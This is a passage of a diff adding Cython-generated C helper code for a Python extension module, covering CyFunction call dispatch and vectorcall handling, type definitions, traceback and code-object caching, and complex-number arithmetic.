__Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + } +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ + static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* ClassMethod */ + static PyObject* __Pyx_Method_ClassMethod(PyObject *method) { +#if CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM <= 0x05080000 + if (PyObject_TypeCheck(method, &PyWrapperDescr_Type)) { + return PyClassMethod_New(method); + } +#else +#if CYTHON_COMPILING_IN_PYPY + if (PyMethodDescr_Check(method)) +#else + #if PY_MAJOR_VERSION == 2 + static PyTypeObject *methoddescr_type = NULL; + if (unlikely(methoddescr_type == NULL)) { + PyObject *meth = PyObject_GetAttrString((PyObject*)&PyList_Type, "append"); + if (unlikely(!meth)) return NULL; + methoddescr_type = Py_TYPE(meth); + Py_DECREF(meth); + } + #else + PyTypeObject *methoddescr_type = &PyMethodDescr_Type; + #endif + if (__Pyx_TypeCheck(method, methoddescr_type)) +#endif + { + PyMethodDescrObject *descr = (PyMethodDescrObject *)method; + #if PY_VERSION_HEX < 0x03020000 + PyTypeObject *d_type = descr->d_type; + #else + PyTypeObject *d_type = descr->d_common.d_type; + #endif + return PyDescr_NewClassMethod(d_type, descr->d_method); + } +#endif + else if (PyMethod_Check(method)) { + return PyClassMethod_New(PyMethod_GET_FUNCTION(method)); + } + else { + return PyClassMethod_New(method); + } +} + +/* GetNameInClass */ + static PyObject *__Pyx__GetNameInClass(PyObject *nmspace, PyObject *name) { + PyObject *result; + PyObject *dict; + assert(PyType_Check(nmspace)); +#if CYTHON_USE_TYPE_SLOTS + dict = ((PyTypeObject*)nmspace)->tp_dict; + Py_XINCREF(dict); +#else + dict = PyObject_GetAttr(nmspace, __pyx_n_s_dict); +#endif + if (likely(dict)) { + result = PyObject_GetItem(dict, name); + Py_DECREF(dict); + if (result) { + return result; + } + } + PyErr_Clear(); + __Pyx_GetModuleGlobalNameUncached(result, name); + return result; +} + +/* CLineInTraceback */ + #ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ + #if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) { + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ + #include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +#if PY_MAJOR_VERSION < 3 +static int __Pyx_GetBuffer(PyObject *obj, Py_buffer *view, int flags) { + __Pyx_TypeName obj_type_name; + if (PyObject_CheckBuffer(obj)) return PyObject_GetBuffer(obj, view, flags); + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' does not have the buffer interface", + obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return -1; +} +static void __Pyx_ReleaseBuffer(Py_buffer *view) { + PyObject *obj = view->obj; + if (!obj) return; + if (PyObject_CheckBuffer(obj)) { + PyBuffer_Release(view); + return; + } + if ((0)) {} + view->obj = NULL; + Py_DECREF(obj); +} +#endif + + + /* Declarations */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + return ::std::complex< float >(x, y); + } + #else + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + return x + y*(__pyx_t_float_complex)_Complex_I; + } + #endif +#else + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + __pyx_t_float_complex z; + z.real = x; + z.imag = y; + return z; + } +#endif + +/* Arithmetic */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) +#else + static CYTHON_INLINE int __Pyx_c_eq_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + return (a.real == b.real) && (a.imag == b.imag); + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_sum_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real + b.real; + z.imag = a.imag + b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_diff_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real - b.real; + z.imag = a.imag - b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_prod_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real * b.real - a.imag * b.imag; + z.imag = a.real * b.imag + a.imag * b.real; + return z; + } + #if 1 + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + if (b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.real); + } else if (fabsf(b.real) >= fabsf(b.imag)) { + if (b.real == 0 && b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.imag); + } else { + float r = b.imag / b.real; + float s = (float)(1.0) / (b.real + b.imag * r); + return __pyx_t_float_complex_from_parts( + (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); + } + } else { + float r = b.real / b.imag; + float s = (float)(1.0) / (b.imag + b.real * r); + return __pyx_t_float_complex_from_parts( + (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); + } + } + #else + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + if (b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.real); + } else { + float denom = b.real * b.real + b.imag * b.imag; + return __pyx_t_float_complex_from_parts( + (a.real * b.real + a.imag * b.imag) / denom, + (a.imag * b.real - a.real * b.imag) / denom); + } + } + #endif + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_neg_float(__pyx_t_float_complex a) { + __pyx_t_float_complex z; + z.real = -a.real; + z.imag = -a.imag; + return z; + } + static CYTHON_INLINE int __Pyx_c_is_zero_float(__pyx_t_float_complex a) { + return (a.real == 0) && (a.imag == 0); + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_conj_float(__pyx_t_float_complex a) { + __pyx_t_float_complex z; + z.real = a.real; + z.imag = -a.imag; + return z; + } + #if 1 + static CYTHON_INLINE float __Pyx_c_abs_float(__pyx_t_float_complex z) { + #if !defined(HAVE_HYPOT) || defined(_MSC_VER) + return sqrtf(z.real*z.real + 